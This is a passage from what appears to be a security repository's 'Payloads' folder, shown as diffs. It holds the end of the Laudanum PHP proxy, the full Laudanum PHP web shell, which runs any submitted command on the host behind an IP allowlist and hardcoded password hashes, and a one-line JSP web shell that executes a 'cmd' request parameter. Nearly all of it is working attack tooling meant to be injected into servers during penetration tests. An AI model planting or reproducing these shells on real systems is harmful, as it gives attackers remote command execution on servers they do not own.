$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
//rewrite images and links - hard linked
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
//rewrite images and links - relative reference
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
//rewrite form - absolute reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
//rewrite form - hard linked
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
//rewrite form - relative reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
return $r;
}
/* Initialize some variables we need again and again. */
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
if ($url == "") {
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
}
if ($url == "") {
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Proxy</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.proxy.url.focus();
}
</script>
</head>
<body onload="init()">
<h1>Laudanum PHP Proxy</h1>
<form method="GET" name="proxy">
<input type="text" name="laudurl" size="70">
</form>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
<?php
} else {
$url_c = geturlarray($url);
$params = array_merge($_GET, $_POST);
//don't pass throught the parameter we are using
unset($params["laudurl"]);
//create the query or post parameters
$query = http_build_query($params);
if ($query != "") {
$url_c["query"] = $query;
}
//get the files
$fp = fopen(buildurl($url_c), "rb");
// use the headers, except the response code which is popped off the array
$headers = $http_response_header;
// pop
array_shift($headers);
// fix cookies
$headers = rewritecookies($headers);
$ctype = getcontenttype($headers);
$cencoding = getcontentencoding($headers);
// we will remove gzip encoding later, but we need to remove the header now
// before it is added to the response.
if ($cencoding == "gzip")
$headers = removeheader("Content-Encoding", $headers);
// set headers for response to client
if (preg_match("/text|image/", $ctype)) {
header_remove();
// the number of headers can change due to replacement
$i = 0;
while ($i < count($headers)) {
if (strpos($headers[$i], "Set-Cookie:") == false)
// replace headers
header($headers[$i], true);
else
// if it is the first cookie, replace all the others. Otherwise add
header($headers[$i], false);
$i++;
}
} else {
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
}
// get data
if (preg_match("/text/",$ctype)) { //text
//it is a text format: html, css, js
$data = "";
while (!feof($fp)) {
$data .= fgets($fp, 4096);
}
// uncompress it so it can be rewritten
if ($cencoding == "gzip")
$data = compatible_gzinflate($data);
// rewrite all the links and such
echo rewrite($data, $url_c);
} else {
// binary format or something similar, let it go through
fpassthru($fp);
fclose($fp);
}
}
?>

409
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/php/shell.php Executable file
View file

@ -0,0 +1,409 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to the system. It is built based on the 2.1
*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
*** <mgeisler[at]mgeisler.net>
***
*** Updated by Tim Medin
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("192.168.1.55", "12.2.2.2");
# format is "username" => "password"
# password is generated using sha1sum as shown below (don't forget the -n, KEVIN!)
# echo -n Password1 | sha1sum
$users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1;
}
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Shell Access</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2012, <a
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
function logout() {
$_SESSION = array('authenticated' => false);
if (isset($_COOKIE[session_name()]))
setcookie(session_name(), '', time()-42000, '/');
session_destroy();
}
function stripslashes_deep($value) {
if (is_array($value))
return array_map('stripslashes_deep', $value);
else
return stripslashes($value);
}
if (get_magic_quotes_gpc())
$_POST = stripslashes_deep($_POST);
/* Initialize some variables we need again and again. */
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
$command = isset($_POST['command']) ? $_POST['command'] : '';
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
///* Default settings --- these settings should always be set to something. */
//$default_settings = array('home-directory' => '.');
///* Merge settings. */
//$ini['settings'] = array_merge($default_settings, $ini['settings']);
session_start();
/* Delete the session data if the user requested a logout. This leaves the
* session cookie at the user, but this is not important since we
* authenticates on $_SESSION['authenticated']. */
if (isset($_POST['logout']))
logout();
///* Attempt authentication. */
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
// isset($ini['users'][$username])) {
// if (strchr($ini['users'][$username], ':') === false) {
// // No seperator found, assume this is a password in clear text.
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
// } else {
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
// }
//}
/* Attempt authentication. */
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
$_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
/* Enforce default non-authenticated state if the above code didn't set it
* already. */
if (!isset($_SESSION['authenticated']))
$_SESSION['authenticated'] = false;
if ($_SESSION['authenticated']) {
/* Initialize the session variables. */
if (empty($_SESSION['cwd'])) {
$_SESSION['cwd'] = '.';
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($command, $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $command);
/* Now append the commmand to the output. */
$_SESSION['output'] .= '$ ' . $command . "\n";
/* Initialize the current working directory. */
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} elseif (trim($command) == 'exit') {
logout();
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
}
/* Alias expansion. */
$length = strcspn($command, " \t");
$token = substr($command, 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($command, $length);
$io = array();
$p = proc_open($command,
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Shell</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
<?php if ($_SESSION['authenticated']) { ?>
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
<?php } else { ?>
function init() {
document.shell.username.focus();
}
<?php } ?>
</script>
</head>
<body onload="init()">
<h1>Laudanum Shell</h1>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<?php
if (!$_SESSION['authenticated']) {
/* Genereate a new nounce every time we preent the login page. This binds
* each login to a unique hit on the server and prevents the simple replay
* attack where one uses the back button in the browser to replay the POST
* data from a login. */
$_SESSION['nounce'] = mt_rand();
?>
<fieldset>
<legend>Authentication</legend>
<?php
if (!empty($username))
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
else
echo " <p>Please login:</p>\n";
?>
<p>Username: <input name="username" type="text" value="<?php echo $username
?>"></p>
<p>Password: <input name="password" type="password"></p>
<p><input type="submit" value="Login"></p>
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
</fieldset>
<?php } else { /* Authenticated. */ ?>
<fieldset>
<legend>Current Working Directory: <code><?php
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
?></code></legend>
<div id="terminal">
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p id="prompt">
$&nbsp;<input name="command" type="text"
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
</p>
</div>
<p>
<span style="float: right">Size: <input type="text" name="rows" size="2"
maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text"
name="columns" size="2" maxlength="3" value="<?php echo $columns
?>"></span>
<input type="submit" value="Execute Command">
<input type="submit" name="logout" value="Logout">
</p>
</fieldset>
<?php } ?>
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

3
Vulnerabilities_and_Exploits/Payloads/simple_shell.jsp Executable file
View file

@ -0,0 +1,3 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>